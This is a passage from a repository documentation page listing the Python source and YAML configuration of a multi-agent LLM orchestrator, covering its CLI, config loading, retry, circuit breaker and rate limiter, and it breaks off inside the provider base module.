Files
system-docs/02_COMPONENTES/servicios externos/orchestratorv6.md
ARCHITECT 6ea70bd34f Update to Skynet v7 - Complete documentation restructure
- Nueva estructura de carpetas según Skynet v7
- Añadidos schemas SQL completos
- Documentación de entidades, componentes e integraciones
- Modelo de seguridad actualizado
- Infraestructura y operaciones reorganizadas
2025-12-29 18:23:41 +00:00

122 KiB

TZZR Orchestrator v6 - Código Completo

Sistema de orquestación multi-agente robusto y flexible.

Índice

  1. Estructura del Proyecto
  2. main.py
  3. config.yaml
  4. orchestrator/__init__.py
  5. orchestrator/config.py
  6. orchestrator/core/__init__.py
  7. orchestrator/core/retry.py
  8. orchestrator/core/circuit_breaker.py
  9. orchestrator/core/rate_limiter.py
  10. orchestrator/providers/__init__.py
  11. orchestrator/providers/base.py
  12. orchestrator/providers/claude_provider.py
  13. orchestrator/providers/litellm_provider.py
  14. orchestrator/tools/__init__.py
  15. orchestrator/tools/definitions.py
  16. orchestrator/tools/executor.py
  17. orchestrator/agents/__init__.py
  18. orchestrator/agents/base.py
  19. orchestrator/tracking/__init__.py
  20. Ejemplos de Configuración

Estructura del Proyecto

tzzr_v6/
├── main.py                  # Punto de entrada
├── config.yaml              # Configuración principal
├── .env                     # Variables de entorno (crear desde .env.example)
├── .env.example             # Ejemplo de variables
├── .gitignore
├── README.md
├── orchestrator/
│   ├── __init__.py
│   ├── config.py            # Gestión de configuración
│   ├── core/                # Componentes de resiliencia
│   │   ├── __init__.py
│   │   ├── circuit_breaker.py
│   │   ├── rate_limiter.py
│   │   └── retry.py
│   ├── providers/           # Proveedores de LLM
│   │   ├── __init__.py
│   │   ├── base.py
│   │   ├── claude_provider.py
│   │   └── litellm_provider.py
│   ├── tools/               # Herramientas
│   │   ├── __init__.py
│   │   ├── definitions.py
│   │   └── executor.py
│   ├── agents/              # Agentes
│   │   ├── __init__.py
│   │   └── base.py
│   └── tracking/            # Cost tracking
│       └── __init__.py
├── logs/                    # Logs por agente
├── outputs/                 # Archivos generados
└── examples/                # Ejemplos de configuración
    ├── simple.yaml
    ├── dev_team.yaml
    ├── devops.yaml
    └── local_ollama.yaml

main.py

#!/usr/bin/env python3
"""
LLM Orchestrator - Multi-agent orchestration system.

Usage:
    python main.py                         # Interactive mode
    python main.py --status                # Show status
    python main.py --agents                # List agents
    python main.py --agent X --prompt "Y"  # Execute prompt
    python main.py --health                # Health check
"""

import asyncio
import argparse
import json
import sys
from datetime import datetime
from pathlib import Path

# Add orchestrator to path
sys.path.insert(0, str(Path(__file__).parent))

from orchestrator.config import get_config, reload_config
from orchestrator.agents import Agent, AgentResult
from orchestrator.tracking import CostTracker


class Orchestrator:
    """Main orchestrator class."""
    
    def __init__(self, config_path: str = None):
        print("🚀 Starting Orchestrator...")
        
        self.config = get_config(config_path)
        self.agents: dict[str, Agent] = {}
        self.cost_tracker = CostTracker()
        
        # Load agents
        for name, agent_config in self.config.agents.items():
            try:
                self.agents[name] = Agent(config_obj=agent_config)
            except Exception as e:
                print(f"⚠️  Error creating agent {name}: {e}")
        
        if self.agents:
            print(f"✅ Loaded {len(self.agents)} agent(s): {', '.join(self.agents.keys())}")
        else:
            print("⚠️  No agents loaded. Edit config.yaml")
    
    async def run_agent(self, agent_name: str, prompt: str) -> AgentResult:
        """Run a single agent."""
        if agent_name not in self.agents:
            return AgentResult(
                success=False,
                output="",
                agent_name=agent_name,
                error=f"Agent '{agent_name}' not found",
            )
        
        result = await self.agents[agent_name].run(prompt)
        
        # Track costs
        if result.usage:
            self.cost_tracker.record(
                model=self.agents[agent_name].model,
                input_tokens=result.usage.get("input_tokens", 0),
                output_tokens=result.usage.get("output_tokens", 0),
            )
        
        return result
    
    async def run_all(self, prompt: str) -> dict[str, AgentResult]:
        """Run all agents in parallel."""
        tasks = {
            name: agent.run(prompt)
            for name, agent in self.agents.items()
        }
        
        results_list = await asyncio.gather(*tasks.values(), return_exceptions=True)
        
        results = {}
        for name, result in zip(tasks.keys(), results_list):
            if isinstance(result, Exception):
                results[name] = AgentResult(
                    success=False,
                    output="",
                    agent_name=name,
                    error=str(result),
                )
            else:
                results[name] = result
        
        return results
    
    async def health_check(self) -> dict[str, bool]:
        """Check health of all agents."""
        results = {}
        for name, agent in self.agents.items():
            try:
                results[name] = await agent.health_check()
            except Exception:
                results[name] = False
        return results
    
    def get_status(self) -> dict:
        """Get orchestrator status."""
        return {
            "config_path": str(self.config.config_path) if self.config.config_path else None,
            "settings": {
                "timeout": self.config.settings.timeout,
                "rate_limit": self.config.settings.rate_limit_per_minute,
                "max_retries": self.config.settings.max_retries,
                "sandbox_paths": self.config.settings.sandbox_paths,
                "circuit_breaker": self.config.settings.enable_circuit_breaker,
            },
            "agents": {
                name: {
                    "provider": agent.provider_name,
                    "model": agent.model,
                    "tools": agent.tools,
                }
                for name, agent in self.agents.items()
            },
            "servers": list(self.config.servers.keys()),
            "costs": self.cost_tracker.summary.to_dict(),
        }
    
    async def interactive(self):
        """Run interactive mode."""
        print("\n" + "=" * 60)
        print("LLM Orchestrator - Interactive Mode")
        print("=" * 60)
        print("\nCommands:")
        print("  /status       - Show status")
        print("  /agents       - List agents")
        print("  /agent <n>    - Switch active agent")
        print("  /logs <n>     - Show agent logs")
        print("  /costs        - Show cost tracking")
        print("  /health       - Health check")
        print("  /reload       - Reload configuration")
        print("  /all          - Run on all agents (parallel)")
        print("  /quit         - Exit")
        print("-" * 60)
        
        if not self.agents:
            print("\n⚠️  No agents available. Edit config.yaml")
            return
        
        current_agent = list(self.agents.keys())[0]
        
        while True:
            try:
                prompt = input(f"\n[{current_agent}] > ").strip()
                
                if not prompt:
                    continue
                
                if prompt == "/quit":
                    print("Goodbye!")
                    break
                
                elif prompt == "/status":
                    print(json.dumps(self.get_status(), indent=2))
                
                elif prompt == "/agents":
                    for name, agent in self.agents.items():
                        marker = "→" if name == current_agent else " "
                        print(f"  {marker} {name}: {agent.provider_name}/{agent.model}")
                        if agent.tools:
                            print(f"      tools: {', '.join(agent.tools)}")
                
                elif prompt.startswith("/agent "):
                    name = prompt[7:].strip()
                    if name in self.agents:
                        current_agent = name
                        print(f"Active agent: {current_agent}")
                    else:
                        print(f"Agent '{name}' not found. Available: {', '.join(self.agents.keys())}")
                
                elif prompt.startswith("/logs "):
                    name = prompt[6:].strip()
                    if name in self.agents:
                        log = self.agents[name].read_log(last_n=5)
                        print(log if log else "(empty)")
                    else:
                        print(f"Agent '{name}' not found")
                
                elif prompt == "/costs":
                    summary = self.cost_tracker.summary
                    print(f"\n📊 Cost Summary:")
                    print(f"   Requests: {summary.total_requests}")
                    print(f"   Tokens: {summary.total_input_tokens:,} in / {summary.total_output_tokens:,} out")
                    print(f"   Cost: ${summary.total_cost_usd:.4f}")
                    if summary.by_model:
                        print("\n   By model:")
                        for model, data in summary.by_model.items():
                            print(f"     {model}: {data['requests']} req, ${data['cost_usd']:.4f}")
                
                elif prompt == "/health":
                    print("Checking health...")
                    results = await self.health_check()
                    for name, healthy in results.items():
                        status = "✅" if healthy else "❌"
                        print(f"  {status} {name}")
                
                elif prompt == "/reload":
                    self.config = reload_config()
                    self.agents = {}
                    for name, agent_config in self.config.agents.items():
                        try:
                            self.agents[name] = Agent(config_obj=agent_config)
                        except Exception as e:
                            print(f"⚠️  Error: {name}: {e}")
                    print(f"✅ Reloaded: {len(self.agents)} agent(s)")
                    if self.agents:
                        current_agent = list(self.agents.keys())[0]
                
                elif prompt == "/all":
                    user_prompt = input("Prompt: ").strip()
                    if user_prompt:
                        print("Running on all agents...")
                        results = await self.run_all(user_prompt)
                        for name, result in results.items():
                            status = "✅" if result.success else "❌"
                            output = result.output[:300] + "..." if len(result.output) > 300 else result.output
                            print(f"\n{status} {name}:\n{output or result.error}")
                
                elif prompt.startswith("/"):
                    print(f"Unknown command: {prompt}")
                
                else:
                    print("Running...")
                    result = await self.run_agent(current_agent, prompt)
                    
                    if result.success:
                        print(f"\n{result.output}")
                        if result.tool_results:
                            print(f"\n[Tools used: {len(result.tool_results)}]")
                    else:
                        print(f"\n{result.error}")
                
            except KeyboardInterrupt:
                print("\n\nUse /quit to exit.")
            except Exception as e:
                print(f"\n❌ Error: {e}")


async def main():
    parser = argparse.ArgumentParser(description="LLM Orchestrator")
    parser.add_argument("--config", type=str, help="Path to config.yaml")
    parser.add_argument("--status", action="store_true", help="Show status")
    parser.add_argument("--agents", action="store_true", help="List agents")
    parser.add_argument("--agent", type=str, help="Agent to use")
    parser.add_argument("--prompt", type=str, help="Prompt to execute")
    parser.add_argument("--health", action="store_true", help="Health check")
    
    args = parser.parse_args()
    
    orchestrator = Orchestrator(args.config)
    
    if args.status:
        print(json.dumps(orchestrator.get_status(), indent=2))
    
    elif args.agents:
        for name, agent in orchestrator.agents.items():
            print(f"  {name}: {agent.provider_name}/{agent.model}")
    
    elif args.health:
        results = await orchestrator.health_check()
        for name, healthy in results.items():
            status = "✅" if healthy else "❌"
            print(f"  {status} {name}")
    
    elif args.agent and args.prompt:
        result = await orchestrator.run_agent(args.agent, args.prompt)
        if result.success:
            print(result.output)
        else:
            print(f"Error: {result.error}", file=sys.stderr)
            sys.exit(1)
    
    else:
        await orchestrator.interactive()


if __name__ == "__main__":
    asyncio.run(main())

config.yaml

# config.yaml - LLM Orchestrator Configuration
#
# Edit this file to define your agents and servers.

# ============================================================================
# SETTINGS
# ============================================================================

settings:
  # Default provider/model if not specified per agent
  default_provider: claude
  default_model: sonnet
  
  # Timeout in seconds
  timeout: 300
  
  # Working directory (relative to this file)
  working_dir: .
  
  # Max tool iterations per turn
  max_tool_iterations: 10
  
  # Security
  sandbox_paths: true              # Restrict file access to working_dir
  ssh_strict_host_checking: true   # Verify SSH hosts
  # allowed_commands: []           # Whitelist commands (empty = all allowed)
  
  # Rate limiting
  rate_limit_per_minute: 60
  
  # Retry
  max_retries: 3
  retry_delay: 1.0
  
  # Circuit breaker (protects against cascading failures)
  enable_circuit_breaker: true
  circuit_breaker_threshold: 5     # Failures before opening
  circuit_breaker_timeout: 30.0    # Seconds before retry

# ============================================================================
# SERVERS (optional)
# ============================================================================
# Define servers for SSH access

servers:
  # Example:
  # production:
  #   host: 192.168.1.100
  #   user: deploy
  #   key: ~/.ssh/id_rsa
  #   port: 22
  #   description: "Production server"

# ============================================================================
# AGENTS
# ============================================================================
# Define your AI agents

agents:
  # Default assistant
  assistant:
    role: |
      You are a helpful assistant that can execute commands,
      read and write files, and help with various tasks.
    provider: claude
    model: sonnet
    tools:
      - bash
      - read
      - write
      - list_dir
      - glob
  
  # Coder agent (uncomment to enable)
  # coder:
  #   role: |
  #     You are an expert programmer.
  #     You write clean, well-documented, and testable code.
  #     You follow best practices and include error handling.
  #   provider: claude
  #   model: sonnet
  #   tools:
  #     - read
  #     - write
  #     - bash
  #     - grep
  #     - glob

# ============================================================================
# TASKS (optional)
# ============================================================================
# Define automated task sequences

tasks:
  # Example:
  # deploy:
  #   description: "Deploy application to production"
  #   steps:
  #     - agent: coder
  #       prompt: "Run tests"
  #     - agent: deployer
  #       prompt: "Deploy to production"

orchestrator/__init__.py

"""
Orchestrator module.
"""

from .config import Config, get_config, reload_config, AgentConfig, ServerConfig, Settings
from .agents import Agent, AgentResult

__all__ = [
    "Config",
    "get_config",
    "reload_config",
    "AgentConfig",
    "ServerConfig", 
    "Settings",
    "Agent",
    "AgentResult",
]

orchestrator/config.py

"""
Configuration management.

Loads configuration from:
1. Environment variables
2. .env file
3. config.yaml

NEVER hardcode credentials.
"""

import os
from pathlib import Path
from dataclasses import dataclass, field
from typing import Optional, Dict, Any, List


def load_env():
    """Load variables from .env file if it exists."""
    env_paths = [
        Path.cwd() / ".env",
        Path(__file__).parent.parent / ".env",
    ]
    
    for env_file in env_paths:
        if env_file.exists():
            with open(env_file) as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith("#") and "=" in line:
                        key, _, value = line.partition("=")
                        key = key.strip()
                        value = value.strip().strip('"').strip("'")
                        if key and value:
                            os.environ.setdefault(key, value)
            break


# Load .env on import
load_env()


def get_env(key: str, default: str = "") -> str:
    """Get environment variable."""
    return os.environ.get(key, default)


def get_env_bool(key: str, default: bool = False) -> bool:
    """Get environment variable as boolean."""
    val = os.environ.get(key, "").lower()
    if val in ("true", "yes", "1"):
        return True
    if val in ("false", "no", "0"):
        return False
    return default


def get_env_list(key: str, default: Optional[List] = None) -> List:
    """Get environment variable as list."""
    val = os.environ.get(key, "")
    if val:
        return [x.strip() for x in val.split(",") if x.strip()]
    return default or []


@dataclass
class ServerConfig:
    """Server configuration for SSH."""
    name: str
    host: str
    user: str = "root"
    key: str = ""
    port: int = 22
    description: str = ""
    
    def __post_init__(self):
        if not self.key:
            self.key = get_env("SSH_KEY_PATH", "~/.ssh/id_rsa")


@dataclass
class AgentConfig:
    """Agent configuration."""
    name: str
    role: str
    provider: str = "claude"
    model: str = "sonnet"
    tools: List[str] = field(default_factory=list)
    servers: List[str] = field(default_factory=list)
    max_turns: int = 10


@dataclass
class Settings:
    """General settings."""
    default_provider: str = "claude"
    default_model: str = "sonnet"
    timeout: float = 300.0
    working_dir: str = "."
    max_tool_iterations: int = 10
    
    # Security
    ssh_strict_host_checking: bool = True
    sandbox_paths: bool = True
    allowed_commands: List[str] = field(default_factory=list)
    
    # Rate limiting
    rate_limit_per_minute: int = 60
    
    # Retry
    max_retries: int = 3
    retry_delay: float = 1.0
    
    # Circuit breaker
    enable_circuit_breaker: bool = True
    circuit_breaker_threshold: int = 5
    circuit_breaker_timeout: float = 30.0


class Config:
    """Main configuration manager."""
    
    def __init__(self, config_path: Optional[str] = None):
        self.config_path = self._find_config(config_path)
        self.base_dir = self.config_path.parent if self.config_path else Path.cwd()
        self._raw = self._load_yaml() if self.config_path else {}
        
        # Parse configuration
        self.settings = self._parse_settings()
        self.servers = self._parse_servers()
        self.agents = self._parse_agents()
        self.tasks = self._raw.get("tasks", {})
        
        # Directories
        self.logs_dir = self.base_dir / "logs"
        self.outputs_dir = self.base_dir / "outputs"
        
        # Create directories
        self.logs_dir.mkdir(exist_ok=True)
        self.outputs_dir.mkdir(exist_ok=True)
    
    def _find_config(self, config_path: Optional[str]) -> Optional[Path]:
        """Find configuration file."""
        if config_path:
            path = Path(config_path)
            if path.exists():
                return path
            raise FileNotFoundError(f"Config not found: {config_path}")
        
        search_paths = [
            Path.cwd() / "config.yaml",
            Path.cwd() / "config.yml",
            Path(__file__).parent.parent / "config.yaml",
        ]
        
        for path in search_paths:
            if path.exists():
                return path
        
        return None
    
    def _load_yaml(self) -> dict:
        """Load YAML file."""
        if not self.config_path:
            return {}
        
        try:
            import yaml
            with open(self.config_path) as f:
                return yaml.safe_load(f) or {}
        except ImportError:
            print("WARNING: PyYAML not installed. Run: pip install pyyaml")
            return {}
    
    def _parse_settings(self) -> Settings:
        """Parse settings section."""
        raw = self._raw.get("settings", {})
        return Settings(
            default_provider=raw.get("default_provider", "claude"),
            default_model=raw.get("default_model", "sonnet"),
            timeout=float(raw.get("timeout", 300)),
            working_dir=raw.get("working_dir", "."),
            max_tool_iterations=int(raw.get("max_tool_iterations", 10)),
            ssh_strict_host_checking=raw.get(
                "ssh_strict_host_checking",
                get_env_bool("SSH_KNOWN_HOSTS_CHECK", True)
            ),
            sandbox_paths=raw.get("sandbox_paths", True),
            allowed_commands=raw.get("allowed_commands", []),
            rate_limit_per_minute=int(raw.get("rate_limit_per_minute", 60)),
            max_retries=int(raw.get("max_retries", 3)),
            retry_delay=float(raw.get("retry_delay", 1.0)),
            enable_circuit_breaker=raw.get("enable_circuit_breaker", True),
            circuit_breaker_threshold=int(raw.get("circuit_breaker_threshold", 5)),
            circuit_breaker_timeout=float(raw.get("circuit_breaker_timeout", 30.0)),
        )
    
    def _parse_servers(self) -> Dict[str, ServerConfig]:
        """Parse servers section."""
        servers = {}
        for name, data in self._raw.get("servers", {}).items():
            if data:
                servers[name] = ServerConfig(
                    name=name,
                    host=data.get("host", ""),
                    user=data.get("user", "root"),
                    key=data.get("key", get_env("SSH_KEY_PATH", "~/.ssh/id_rsa")),
                    port=int(data.get("port", 22)),
                    description=data.get("description", ""),
                )
        return servers
    
    def _parse_agents(self) -> Dict[str, AgentConfig]:
        """Parse agents section."""
        agents = {}
        for name, data in self._raw.get("agents", {}).items():
            if data:
                agents[name] = AgentConfig(
                    name=name,
                    role=data.get("role", ""),
                    provider=data.get("provider", self.settings.default_provider),
                    model=data.get("model", self.settings.default_model),
                    tools=data.get("tools", []),
                    servers=data.get("servers", []),
                    max_turns=int(data.get("max_turns", self.settings.max_tool_iterations)),
                )
        return agents
    
    def get_agent(self, name: str) -> Optional[AgentConfig]:
        return self.agents.get(name)
    
    def get_server(self, name: str) -> Optional[ServerConfig]:
        return self.servers.get(name)
    
    def list_agents(self) -> List[str]:
        return list(self.agents.keys())
    
    def list_servers(self) -> List[str]:
        return list(self.servers.keys())


# Global instance
_config: Optional[Config] = None


def get_config(config_path: Optional[str] = None) -> Config:
    """Get global configuration."""
    global _config
    if _config is None:
        _config = Config(config_path)
    return _config


def reload_config(config_path: Optional[str] = None) -> Config:
    """Reload configuration."""
    global _config
    _config = Config(config_path)
    return _config

orchestrator/core/__init__.py

"""
Core components for resilience and reliability.
"""

from .retry import retry_with_backoff, RetryConfig
from .circuit_breaker import CircuitBreaker, CircuitState
from .rate_limiter import RateLimiter

__all__ = [
    "retry_with_backoff",
    "RetryConfig", 
    "CircuitBreaker",
    "CircuitState",
    "RateLimiter",
]

orchestrator/core/retry.py

"""
Retry logic with exponential backoff.

Features:
- Configurable retry attempts
- Exponential backoff with jitter
- Selective exception handling
- Async support
"""

import asyncio
import random
from dataclasses import dataclass, field
from typing import Callable, TypeVar, Optional, Type, Tuple, Any
from functools import wraps

T = TypeVar("T")


@dataclass
class RetryConfig:
    """Configuration for retry behavior."""
    
    max_retries: int = 3
    base_delay: float = 1.0
    max_delay: float = 60.0
    exponential_base: float = 2.0
    jitter: bool = True
    
    # Exceptions that should trigger retry
    retryable_exceptions: Tuple[Type[Exception], ...] = field(
        default_factory=lambda: (
            ConnectionError,
            TimeoutError,
            asyncio.TimeoutError,
        )
    )
    
    # Exceptions that should NOT retry (fail immediately)
    fatal_exceptions: Tuple[Type[Exception], ...] = field(
        default_factory=lambda: (
            KeyboardInterrupt,
            SystemExit,
            PermissionError,
        )
    )
    
    def calculate_delay(self, attempt: int) -> float:
        """Calculate delay for given attempt number."""
        delay = min(
            self.base_delay * (self.exponential_base ** attempt),
            self.max_delay
        )
        
        if self.jitter:
            # Add random jitter (±25%)
            delay = delay * (0.75 + random.random() * 0.5)
        
        return delay
    
    def should_retry(self, exception: Exception) -> bool:
        """Determine if exception should trigger retry."""
        if isinstance(exception, self.fatal_exceptions):
            return False
        
        if self.retryable_exceptions:
            return isinstance(exception, self.retryable_exceptions)
        
        # By default, retry on any non-fatal exception
        return True


async def retry_with_backoff(
    func: Callable[..., T],
    *args,
    config: Optional[RetryConfig] = None,
    on_retry: Optional[Callable[[int, Exception], None]] = None,
    **kwargs
) -> Tuple[T, int]:
    """
    Execute async function with retry and exponential backoff.
    
    Args:
        func: Async function to execute
        *args: Arguments for func
        config: Retry configuration
        on_retry: Optional callback on each retry (attempt, exception)
        **kwargs: Keyword arguments for func
        
    Returns:
        Tuple of (result, number_of_retries)
        
    Raises:
        Last exception if all retries exhausted
    """
    config = config or RetryConfig()
    last_exception: Optional[Exception] = None
    
    for attempt in range(config.max_retries + 1):
        try:
            if asyncio.iscoroutinefunction(func):
                result = await func(*args, **kwargs)
            else:
                result = func(*args, **kwargs)
            return result, attempt
            
        except Exception as e:
            last_exception = e
            
            # Check if we should retry
            if not config.should_retry(e):
                raise
            
            # Check if we have retries left
            if attempt >= config.max_retries:
                raise
            
            # Calculate delay and wait
            delay = config.calculate_delay(attempt)
            
            # Call retry callback if provided
            if on_retry:
                on_retry(attempt + 1, e)
            
            await asyncio.sleep(delay)
    
    # Should never reach here, but just in case
    if last_exception:
        raise last_exception
    raise RuntimeError("Retry logic error")


def with_retry(config: Optional[RetryConfig] = None):
    """
    Decorator for retry with backoff.
    
    Usage:
        @with_retry(RetryConfig(max_retries=5))
        async def my_function():
            ...
    """
    def decorator(func: Callable[..., T]) -> Callable[..., T]:
        @wraps(func)
        async def wrapper(*args, **kwargs) -> T:
            result, _ = await retry_with_backoff(func, *args, config=config, **kwargs)
            return result
        return wrapper
    return decorator

orchestrator/core/circuit_breaker.py

"""
Circuit Breaker pattern implementation.

Protects against cascading failures by:
- Tracking failure rates
- Opening circuit after threshold
- Auto-recovery with half-open state
"""

import asyncio
import time
from dataclasses import dataclass
from enum import Enum
from typing import Callable, TypeVar, Optional, Any

T = TypeVar("T")


class CircuitState(Enum):
    """Circuit breaker states."""
    CLOSED = "closed"       # Normal operation
    OPEN = "open"           # Failing, reject calls
    HALF_OPEN = "half_open" # Testing recovery


@dataclass
class CircuitStats:
    """Statistics for circuit breaker."""
    total_calls: int = 0
    successful_calls: int = 0
    failed_calls: int = 0
    rejected_calls: int = 0
    last_failure_time: Optional[float] = None
    last_success_time: Optional[float] = None
    
    @property
    def failure_rate(self) -> float:
        if self.total_calls == 0:
            return 0.0
        return self.failed_calls / self.total_calls


class CircuitBreakerError(Exception):
    """Raised when circuit is open."""
    pass


class CircuitBreaker:
    """
    Circuit breaker for fault tolerance.
    
    States:
    - CLOSED: Normal operation, tracking failures
    - OPEN: Circuit tripped, rejecting calls immediately
    - HALF_OPEN: Testing if service recovered
    
    Usage:
        breaker = CircuitBreaker(failure_threshold=5)
        
        async with breaker:
            result = await risky_operation()
    """
    
    def __init__(
        self,
        failure_threshold: int = 5,
        success_threshold: int = 2,
        timeout: float = 30.0,
        half_open_max_calls: int = 3,
    ):
        """
        Args:
            failure_threshold: Failures before opening circuit
            success_threshold: Successes in half-open to close
            timeout: Seconds before trying half-open
            half_open_max_calls: Max concurrent calls in half-open
        """
        self.failure_threshold = failure_threshold
        self.success_threshold = success_threshold
        self.timeout = timeout
        self.half_open_max_calls = half_open_max_calls
        
        self._state = CircuitState.CLOSED
        self._failure_count = 0
        self._success_count = 0
        self._last_failure_time: Optional[float] = None
        self._half_open_calls = 0
        self._lock = asyncio.Lock()
        
        self.stats = CircuitStats()
    
    @property
    def state(self) -> CircuitState:
        """Current circuit state."""
        return self._state
    
    @property
    def is_closed(self) -> bool:
        return self._state == CircuitState.CLOSED
    
    @property
    def is_open(self) -> bool:
        return self._state == CircuitState.OPEN
    
    def _should_attempt_reset(self) -> bool:
        """Check if enough time passed to try half-open."""
        if self._last_failure_time is None:
            return True
        return time.time() - self._last_failure_time >= self.timeout
    
    async def _check_state(self) -> bool:
        """
        Check and potentially transition state.
        Returns True if call should proceed.
        """
        async with self._lock:
            if self._state == CircuitState.CLOSED:
                return True
            
            if self._state == CircuitState.OPEN:
                if self._should_attempt_reset():
                    self._state = CircuitState.HALF_OPEN
                    self._success_count = 0
                    self._half_open_calls = 0
                else:
                    self.stats.rejected_calls += 1
                    return False
            
            if self._state == CircuitState.HALF_OPEN:
                if self._half_open_calls >= self.half_open_max_calls:
                    self.stats.rejected_calls += 1
                    return False
                self._half_open_calls += 1
            
            return True
    
    async def _record_success(self):
        """Record successful call."""
        async with self._lock:
            self.stats.total_calls += 1
            self.stats.successful_calls += 1
            self.stats.last_success_time = time.time()
            
            if self._state == CircuitState.HALF_OPEN:
                self._success_count += 1
                if self._success_count >= self.success_threshold:
                    self._state = CircuitState.CLOSED
                    self._failure_count = 0
            
            elif self._state == CircuitState.CLOSED:
                # Reset failure count on success
                self._failure_count = 0
    
    async def _record_failure(self, exception: Exception):
        """Record failed call."""
        async with self._lock:
            self.stats.total_calls += 1
            self.stats.failed_calls += 1
            self.stats.last_failure_time = time.time()
            self._last_failure_time = time.time()
            
            if self._state == CircuitState.HALF_OPEN:
                # Any failure in half-open reopens circuit
                self._state = CircuitState.OPEN
            
            elif self._state == CircuitState.CLOSED:
                self._failure_count += 1
                if self._failure_count >= self.failure_threshold:
                    self._state = CircuitState.OPEN
    
    async def call(
        self,
        func: Callable[..., T],
        *args,
        **kwargs
    ) -> T:
        """
        Execute function through circuit breaker.
        
        Raises:
            CircuitBreakerError: If circuit is open
        """
        if not await self._check_state():
            raise CircuitBreakerError(
                f"Circuit breaker is {self._state.value}. "
                f"Retry after {self.timeout}s"
            )
        
        try:
            if asyncio.iscoroutinefunction(func):
                result = await func(*args, **kwargs)
            else:
                result = func(*args, **kwargs)
            
            await self._record_success()
            return result
            
        except Exception as e:
            await self._record_failure(e)
            raise
    
    async def __aenter__(self):
        """Async context manager entry."""
        if not await self._check_state():
            raise CircuitBreakerError(
                f"Circuit breaker is {self._state.value}"
            )
        return self
    
    async def __aexit__(self, exc_type, exc_val, exc_tb):
        """Async context manager exit."""
        if exc_type is None:
            await self._record_success()
        else:
            await self._record_failure(exc_val)
        return False  # Don't suppress exceptions
    
    def reset(self):
        """Manually reset circuit breaker."""
        self._state = CircuitState.CLOSED
        self._failure_count = 0
        self._success_count = 0
        self._last_failure_time = None
        self.stats = CircuitStats()
    
    def __repr__(self) -> str:
        return (
            f"CircuitBreaker(state={self._state.value}, "
            f"failures={self._failure_count}/{self.failure_threshold})"
        )

orchestrator/core/rate_limiter.py

"""
Rate limiter with sliding window.

Features:
- Sliding window algorithm
- Async-safe with lock
- Configurable burst allowance
"""

import asyncio
import time
from collections import deque
from dataclasses import dataclass
from typing import Optional


@dataclass
class RateLimitStats:
    """Statistics for rate limiter."""
    total_requests: int = 0
    allowed_requests: int = 0
    throttled_requests: int = 0
    total_wait_time: float = 0.0


class RateLimiter:
    """
    Sliding window rate limiter.
    
    Limits calls to max_calls per period seconds.
    
    Usage:
        limiter = RateLimiter(max_calls=60, period=60.0)
        
        await limiter.acquire()  # Blocks if rate exceeded
        do_something()
    """
    
    def __init__(
        self,
        max_calls: int = 60,
        period: float = 60.0,
        burst_allowance: int = 0,
    ):
        """
        Args:
            max_calls: Maximum calls allowed in period
            period: Time window in seconds
            burst_allowance: Extra calls allowed for bursts
        """
        self.max_calls = max_calls
        self.period = period
        self.burst_allowance = burst_allowance
        
        self._calls: deque = deque()
        self._lock = asyncio.Lock()
        
        self.stats = RateLimitStats()
    
    @property
    def effective_limit(self) -> int:
        """Effective rate limit including burst."""
        return self.max_calls + self.burst_allowance
    
    def _cleanup_old_calls(self, now: float):
        """Remove calls outside the window."""
        cutoff = now - self.period
        while self._calls and self._calls[0] < cutoff:
            self._calls.popleft()
    
    @property
    def current_usage(self) -> int:
        """Current number of calls in window."""
        self._cleanup_old_calls(time.time())
        return len(self._calls)
    
    @property
    def available_calls(self) -> int:
        """Number of calls available right now."""
        return max(0, self.effective_limit - self.current_usage)
    
    async def acquire(self, timeout: Optional[float] = None) -> bool:
        """
        Acquire permission to make a call.
        
        Blocks until rate limit allows the call.
        
        Args:
            timeout: Maximum time to wait (None = unlimited)
            
        Returns:
            True if acquired, False if timeout
        """
        start_time = time.time()
        
        async with self._lock:
            self.stats.total_requests += 1
            
            while True:
                now = time.time()
                self._cleanup_old_calls(now)
                
                # Check if we can proceed
                if len(self._calls) < self.effective_limit:
                    self._calls.append(now)
                    self.stats.allowed_requests += 1
                    return True
                
                # Calculate wait time
                oldest_call = self._calls[0]
                wait_time = oldest_call + self.period - now
                
                if wait_time <= 0:
                    continue
                
                # Check timeout
                if timeout is not None:
                    elapsed = now - start_time
                    if elapsed + wait_time > timeout:
                        self.stats.throttled_requests += 1
                        return False
                
                # Wait and retry
                self.stats.total_wait_time += wait_time
                
                # Release lock while waiting
                self._lock.release()
                try:
                    await asyncio.sleep(wait_time)
                finally:
                    await self._lock.acquire()
    
    async def try_acquire(self) -> bool:
        """
        Try to acquire without waiting.
        
        Returns:
            True if acquired, False if would need to wait
        """
        async with self._lock:
            self.stats.total_requests += 1
            now = time.time()
            self._cleanup_old_calls(now)
            
            if len(self._calls) < self.effective_limit:
                self._calls.append(now)
                self.stats.allowed_requests += 1
                return True
            
            self.stats.throttled_requests += 1
            return False
    
    def reset(self):
        """Reset rate limiter state."""
        self._calls.clear()
        self.stats = RateLimitStats()
    
    def __repr__(self) -> str:
        return (
            f"RateLimiter({self.current_usage}/{self.effective_limit} "
            f"per {self.period}s)"
        )


class MultiRateLimiter:
    """
    Multiple rate limiters combined.
    
    Useful for APIs with multiple rate limits:
    - 60 requests per minute
    - 1000 requests per hour
    
    Usage:
        limiter = MultiRateLimiter([
            RateLimiter(60, 60),     # per minute
            RateLimiter(1000, 3600), # per hour
        ])
        
        await limiter.acquire()
    """
    
    def __init__(self, limiters: list[RateLimiter]):
        self.limiters = limiters
    
    async def acquire(self, timeout: Optional[float] = None) -> bool:
        """Acquire from all limiters."""
        for limiter in self.limiters:
            if not await limiter.acquire(timeout):
                return False
        return True
    
    async def try_acquire(self) -> bool:
        """Try to acquire from all limiters without waiting."""
        for limiter in self.limiters:
            if not await limiter.try_acquire():
                return False
        return True

orchestrator/providers/__init__.py

"""
LLM Providers.
"""

from .base import BaseProvider, ProviderResponse
from .claude_provider import ClaudeProvider
from .litellm_provider import LiteLLMProvider

__all__ = [
    "BaseProvider",
    "ProviderResponse",
    "ClaudeProvider",
    "LiteLLMProvider",
]

orchestrator/providers/base.py

"""
Base provider with resilience features.

All providers inherit from this and get:
- Rate limiting
- Circuit breaker
- Retry with backoff
- Consistent response format
"""

from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional, Any, List

from ..core import (
    CircuitBreaker,
    RateLimiter,
    RetryConfig,
    retry_with_backoff,
)


@dataclass
class ToolCall:
    """A tool call from the LLM."""
    tool: str
    params: dict
    id: Optional[str] = None


@dataclass 
class ToolResult:
    """Result of executing a tool."""
    tool: str
    success: bool
    output: str
